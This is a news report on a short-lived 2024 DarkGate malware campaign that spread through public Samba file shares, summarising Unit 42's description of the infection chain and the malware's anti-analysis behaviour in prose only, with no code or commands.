Cybersecurity researchers have exposed a brief DarkGate malware campaign that exploited Samba file shares to initiate infections.
According to Palo Alto Networks Unit 42, this activity occurred in March and April 2024, utilizing public-facing Samba file shares hosting Visual Basic Script (VBS) and JavaScript files. The campaign targeted regions in North America, Europe, and parts of Asia.
“This was a relatively short-lived campaign that illustrates how threat actors can creatively abuse legitimate tools and services to distribute their malware,” security researchers Vishwa Thothathri, Yijie Sui, Anmol Maurya, Uday Pratap Singh, and Brad Duncan stated.
DarkGate, first detected in 2018, has evolved into a malware-as-a-service (MaaS) offering, accessible to a select group of customers. It includes features for remote control of compromised hosts, code execution, cryptocurrency mining, launching reverse shells, and deploying additional payloads.
Attacks involving DarkGate have increased significantly following the multinational law enforcement takedown of the QakBot infrastructure in August 2023.
The campaign documented by Unit 42 began with Microsoft Excel (.xlsx) files that, when opened, prompt targets to click an embedded Open button, which then fetches and executes VBS code hosted on a Samba file share.
The VBS script is designed to retrieve and run a PowerShell script, which subsequently downloads an AutoHotKey-based DarkGate package.
Alternate infection sequences using JavaScript files instead of VBS were similar, also downloading and executing the follow-up PowerShell script.
DarkGate operates by scanning for various anti-malware programs and checking CPU information to determine if it is running on a physical host or a virtual environment, which helps it evade analysis. It also monitors running processes to detect reverse engineering tools, debuggers, or virtualization software.
“DarkGate C2 traffic uses unencrypted HTTP requests, but the data is obfuscated and appears as Base64-encoded text,” the researchers explained.
“As DarkGate continues to evolve and refine its methods of infiltration and resistance to analysis, it remains a potent reminder of the need for robust and proactive cybersecurity defenses.”
